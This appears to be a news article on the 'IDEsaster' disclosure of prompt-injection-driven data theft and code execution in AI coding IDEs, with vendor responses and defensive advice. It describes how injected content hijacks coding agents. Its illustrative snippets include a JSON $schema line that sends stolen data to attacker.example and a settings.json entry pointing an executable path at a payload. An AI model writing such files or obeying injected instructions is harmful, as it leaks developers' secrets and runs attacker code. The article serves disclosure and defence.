Over 30 Vulnerabilities Discovered in AI Coding Tools: Data Theft and Remote Code Execution

Author

NEXT2i

A Major Threat to Modern Development Environments

On December 6, 2025, an alarming discovery shook the world of cybersecurity and software development. More than 30 security vulnerabilities were revealed in various AI-powered Integrated Development Environments (IDEs), potentially exposing millions of developers to risks of data theft and remote code execution.

These flaws, which combine prompt injection primitives with legitimate IDE features, were dubbed IDEsaster by security researcher Ari Marzouk (MaccariTA). They affect some of the most popular development tools used by programmers worldwide.

The Affected Tools: An Entire Ecosystem Compromised

The list of vulnerable platforms is particularly concerning as it includes some of the most widely used IDEs and extensions in the software development industry:

Major Compromised Tools

Cursor – A popular AI-powered IDE

Windsurf – AI-powered development environment

Kiro.dev – AI-assisted coding environment

GitHub Copilot – Microsoft's AI coding assistant

Zed.dev – Modern, high-performance code editor

Roo Code – AI code generation tool

Junie (JetBrains) – AI coding agent for JetBrains IDEs

Cline – AI coding assistant

Claude Code – Anthropic's Claude-based development tool

In total, 24 of these vulnerabilities received CVE identifiers (Common Vulnerabilities and Exposures), highlighting the severity and official recognition of these security issues.

A Surprising Discovery: The Scale of the Problem

"I think the fact that several universal attack chains affected all tested AI IDEs is the most surprising discovery of this research," Ari Marzouk told The Hacker News.

The researcher highlights a crucial point: "All AI IDEs (and the coding assistants that integrate with them) effectively ignore the base software (IDE) in their threat model. They treat their features as inherently safe because they have existed for years. However, once you add AI agents capable of acting autonomously, the same features can be weaponized for data exfiltration and remote code execution primitives."

The Anatomy of an Attack: A Triple Threat

IDEsaster vulnerabilities rely on chaining three distinct attack vectors, all common in AI-powered IDEs:

1. Bypassing LLM Guardrails

The first step involves bypassing the protections of a Large Language Model (LLM) to hijack the context and execute the attacker's instructions. This technique, known as prompt injection, allows a malicious actor to manipulate the behavior of the AI model.

2. Automatic Actions Without User Interaction

Modern AI agents can automatically perform certain actions via pre-approved tool calls, without requiring user intervention. This feature, designed to improve productivity, becomes an exploitable weakness when combined with other vulnerabilities.

3. Exploitation of Legitimate IDE Features

The third component involves triggering legitimate IDE features that allow an attacker to cross the security boundary to exfiltrate sensitive data or execute arbitrary commands.

What Makes IDEsaster Unique

These vulnerabilities differ from previous attack chains, which paired prompt injection with vulnerable tools. What makes IDEsaster particularly dangerous is that it uses prompt injection primitives and agent tools to trigger legitimate IDE features, causing information leaks or command execution.

Context Injection Vectors

Context hijacking can be achieved in multiple ways:

User-added context references: Pasted URLs or text containing hidden characters invisible to the human eye but parsable by the LLM.

Poisoning via Model Context Protocol (MCP): Using an MCP server via tool poisoning or "rug pulls."

Attacker-controlled external sources: When a legitimate MCP server parses input controlled by the attacker.

Concrete Attack Examples: Real Scenarios

Attack 1: Data Exfiltration via JSON Schema

Affected Vulnerabilities: CVE-2025-49150 (Cursor), CVE-2025-53097 (Roo Code), CVE-2025-58335 (JetBrains Junie), GitHub Copilot, Kiro.dev, Claude Code.

Attack Method:

Use of prompt injection to read a sensitive file via a legitimate tool ("read_file") or a vulnerable one ("search_files" or "search_project").

Writing a JSON file via a legitimate tool ("write_file" or "edit_file") with a remote JSON schema hosted on a domain controlled by the attacker.

The IDE fetches the remote schema with a GET request whose URL can embed the stolen data, leaking it to the attacker's server.
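As a hedged illustration of the last two steps, the agent-written file might resemble the sketch below. The domain, path, and query parameter are hypothetical placeholders, not details published in the research:

```jsonc
// exfil.json — illustrative sketch only; attacker.example and the
// "leak" parameter are hypothetical placeholders.
{
  // Many editors resolve "$schema" automatically to validate the file.
  // That resolution is an HTTP GET to a URL the agent just wrote, so
  // the contents of the sensitive file can ride out in the query string.
  "$schema": "https://attacker.example/schema.json?leak=BASE64_OF_SECRET_FILE",
  "data": {}
}
```

Because writing a JSON file and resolving its schema are both ordinary IDE behaviors, neither step on its own triggers a security prompt.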

Attack 2: Code Execution via IDE Settings

Affected Vulnerabilities: CVE-2025-53773 (GitHub Copilot), CVE-2025-54130 (Cursor), CVE-2025-53536 (Roo Code), CVE-2025-55012 (Zed.dev), Claude Code.

Attack Method:

Prompt injection to modify IDE configuration files (.vscode/settings.json or .idea/workspace.xml).

Setting "php.validate.executablePath" or "PATH_TO_GIT" to the path of an executable file containing malicious code.

Automatic execution of the malicious code during certain IDE operations.
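A minimal sketch of what such a poisoned settings file could look like in a VS Code-style editor follows; the payload path is a hypothetical placeholder:

```jsonc
// .vscode/settings.json — illustrative only; /tmp/payload is hypothetical.
{
  // The PHP extension invokes this binary to validate PHP files, so an
  // agent-written path to a malicious executable runs attacker code the
  // next time validation fires, with no further user interaction.
  "php.validate.executablePath": "/tmp/payload"
}
```

The JetBrains variant is analogous, with the agent writing an executable path such as "PATH_TO_GIT" into .idea/workspace.xml instead.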

Attack 3: Code Execution via Workspace Configuration

Affected Vulnerabilities: CVE-2025-64660 (GitHub Copilot), CVE-2025-61590 (Cursor), CVE-2025-58372 (Roo Code).

Attack Method:

Prompt injection to modify workspace configuration files (*.code-workspace).

Overwriting multi-root workspace settings to execute arbitrary code.

Exploiting the fact that AI agents are configured by default to auto-approve file writes in the workspace.

This last attack is particularly insidious because it requires neither user interaction nor reopening the workspace for the malicious code to execute.
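In rough outline, a poisoned multi-root workspace file could resemble the sketch below. The exact exploitable settings were not all published, so the key shown is a placeholder rather than a working exploit:

```jsonc
// project.code-workspace — structural sketch only; "some.tool.path"
// is a placeholder, not a real exploited setting.
{
  "folders": [
    { "path": "." }
  ],
  "settings": {
    // Workspace-scoped settings written here are applied live, without
    // reopening the workspace, so a setting that names an executable
    // path can yield code execution with no user interaction at all.
    "some.tool.path": "/tmp/payload"
  }
}
```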

Broader Context: A Wave of Vulnerabilities in AI Tools

The discovery of IDEsaster is part of a broader context of vulnerabilities recently discovered in AI-powered coding tools:

OpenAI Codex CLI (CVE-2025-61260): A command injection flaw in OpenAI Codex CLI exploits the fact that the program implicitly trusts commands configured via MCP server inputs and executes them at startup without asking for user permission. This can lead to arbitrary command execution when a malicious actor can alter the repository's .env and ./.codex/config.toml files.

Google Antigravity: Multiple Vulnerabilities: Several security issues were discovered in Google Antigravity, including indirect prompt injection (using a poisoned web source to manipulate Gemini to collect credentials and sensitive code from the user's IDE) and data exfiltration/RCE via malicious trusted workspaces embedding a persistent backdoor.

PromptPwnd: A New Vulnerability Class: A new category of vulnerability named PromptPwnd targets AI agents connected to vulnerable GitHub Actions (or GitLab CI/CD pipelines). Prompt injections are used to trick them into executing integrated privileged tools leading to information leaks or code execution.

Recommendations for Developers

In the face of these threats, Ari Marzouk offers several essential recommendations:

For AI IDE Users

Trust: Use AI IDEs only with trusted projects and files. Malicious rule files, instructions hidden in source code or other files (README), and even filenames can become prompt injection vectors.

MCP Servers: Connect only to trusted MCP servers. Continuously monitor these servers for modifications (even a trusted server can be compromised).

Data Flow: Review and understand the data flow of MCP tools. Manually examine added sources.

Sanitization: Verify URLs and other sources to detect hidden instructions (HTML comments, hidden CSS text, invisible Unicode characters, etc.).
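As a small sketch of that kind of check, the snippet below scans text for Unicode format characters that are invisible to a reader but still parsed by an LLM. The function name and character ranges are my own choices, not part of the published research, and this covers only the invisible-Unicode vector; HTML comments and CSS-hidden text need separate checks:

```python
import unicodedata

def find_hidden_chars(text: str) -> list[tuple[int, str]]:
    """Return (index, character name) for characters that are invisible
    to a human reader but still visible to an LLM."""
    hits = []
    for i, ch in enumerate(text):
        # Category "Cf" covers zero-width and bidirectional formatting
        # characters; U+E0000-U+E007F are Unicode "tag" characters,
        # another known carrier for hidden instructions.
        if unicodedata.category(ch) == "Cf" or 0xE0000 <= ord(ch) <= 0xE007F:
            hits.append((i, unicodedata.name(ch, f"U+{ord(ch):04X}")))
    return hits

# A zero-width space (U+200B) is invisible in most editors and viewers.
assert find_hidden_chars("Review this PR.") == []
assert find_hidden_chars("Review this PR.\u200b")[0][1] == "ZERO WIDTH SPACE"
```

Running such a filter over pasted URLs, README excerpts, and other context before handing them to an agent makes this particular injection channel much harder to use.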

For AI Agent and IDE Developers

Least Privilege: Apply the principle of least privilege to LLM tools.

Vectors: Minimize prompt injection vectors.

System Prompt: Strengthen the system prompt.

Sandboxing: Use sandboxing to execute commands.

Security Testing: Perform tests to detect path traversal, information leaks, and command injections.

The "Secure for AI" Concept

Marzouk highlights the importance of a new paradigm he calls "Secure for AI". This concept aims to tackle security challenges introduced by AI features, ensuring that products are not only secure by default and secure by design, but also designed considering how AI components can be exploited over time. "This is another example of why the 'Secure for AI' principle is necessary," stated Marzouk. "Connecting AI agents to existing applications (in my case, the IDE; in their case, GitHub Actions) creates new emerging risks."

Impact on Enterprises: An Expanded Attack Surface

As agentic AI tools become increasingly popular in enterprise environments, these discoveries show how they expand the attack surface of development machines. The core problem lies in an LLM's inability to distinguish between:

Instructions provided by a user to accomplish a task.

Content it may ingest from an external source, which may contain an embedded malicious prompt.

Supply Chain Risks

"Any repository using AI for issue triage, PR labeling, code suggestions, or automated responses is at risk," warned Rein Daelman, researcher at Aikido. Threats include prompt injection, command injection, secret exfiltration, repository compromise, and upstream supply chain compromise.

Most Vulnerable Use Cases

Some usage scenarios are particularly at risk:

Collaborative Development: Teams working on collaborative projects with pull requests and automated code reviews are particularly exposed. An attacker could inject malicious code via PR comments that will be processed by the AI agent.

CI/CD: Pipelines that use AI agents to automate deployment or testing tasks can be compromised, allowing an attacker to inject malicious code directly into production environments.

Automated Code Analysis: AI-powered code analysis tools that automatically scan repositories can be tricked into exfiltrating proprietary code or secrets to attacker-controlled servers.

Vendor Responses and Patches

Following these revelations, several vendors have reacted:

Claude Code (Anthropic): Anthropic published a security warning in its documentation, acknowledging the risks and providing guidelines for users to protect themselves.

Other Vendors: Many vendors have begun deploying security patches for the identified CVEs, although the process is still ongoing for several platforms.

Implications for the Future of AI-Assisted Development

This discovery raises important questions about the future of AI-assisted software development:

Need for a New Security Model: Traditional security models are no longer sufficient. IDEs and development tools must be redesigned considering the presence of autonomous AI agents capable of executing actions without direct supervision.

Tension between Productivity and Security: The automation provided by AI agents significantly improves developer productivity, but this convenience must not come at the expense of security. A balance must be found.

Training and Awareness: Developers must be trained on the specific risks related to AI-powered development tools. Understanding attack vectors like prompt injection is becoming an essential skill.

Evolution of Security Standards: Standards bodies and regulators will likely need to develop new frameworks and standards specifically adapted to the security of agentic AI systems.

Immediate Protection Measures

Pending full patches and long-term solutions, here are some measures organizations and developers can take immediately:

For Organizations

Tool Audit: Identify all AI IDEs and coding assistants used in the organization.

Usage Policy: Establish clear policies on the use of AI tools for development.

Monitoring: Implement monitoring of connections to MCP servers and unusual activities.

Isolation: Use isolated development environments for sensitive projects.

Training: Train teams on prompt injection risks and best practices.

For Individual Developers

Vigilance: Remain vigilant when adding external context to the AI.

Verification: Manually verify changes suggested by the AI before accepting them.

Limitation: Limit permissions granted to AI tools.

Updates: Keep all tools up to date with the latest security patches.

Sensitive Data Isolation: Avoid working on projects containing sensitive data with unsecured AI IDEs.

The Importance of Responsible Disclosure

It is important to note that these vulnerabilities were discovered and disclosed responsibly by Ari Marzouk. This approach allows vendors to develop and deploy patches before full technical details are made public, minimizing the window of opportunity for malicious actors.

Conclusion: A Turning Point for Development Tool Security

The discovery of IDEsaster marks a significant turning point in our understanding of the security of AI-powered development tools. These 30+ vulnerabilities reveal that integrating artificial intelligence into development environments creates entirely new attack vectors that did not exist before.

The key message is that features considered safe for years suddenly become attack primitives when combined with autonomous AI agents capable of acting without direct supervision. This reality requires a fundamental overhaul of our approach to development tool security.

Towards a Safer Future

For AI-powered development tools to reach their full potential while remaining safe, several evolutions are necessary:

Widespread adoption of the "Secure for AI" principle: Product developers must systematically consider how AI components can be exploited.

Industry-research collaboration: Security researchers and AI tool developers must work together to anticipate and prevent new classes of vulnerabilities.

Standards and regulations: Security frameworks specific to AI systems must be developed and adopted.

Continuous education: Developers must be continuously trained on new AI-related security risks.

A Call to Action

IDEsaster is not simply a list of bugs to fix. It is a wake-up call reminding us that integrating AI into our daily tools requires constant vigilance and a proactive approach to security. Developers, organizations, and tool vendors must all play their part to ensure that the AI revolution in software development proceeds securely.

The question is not whether we should adopt AI-powered development tools—this adoption is already underway and irreversible. The question is how we can do so safely, protecting our data, our code, and our systems against the new threats that accompany these powerful technologies.

Ari Marzouk's discoveries give us the knowledge needed to begin answering this question. It is now up to the entire software development community to take these warnings seriously and act accordingly.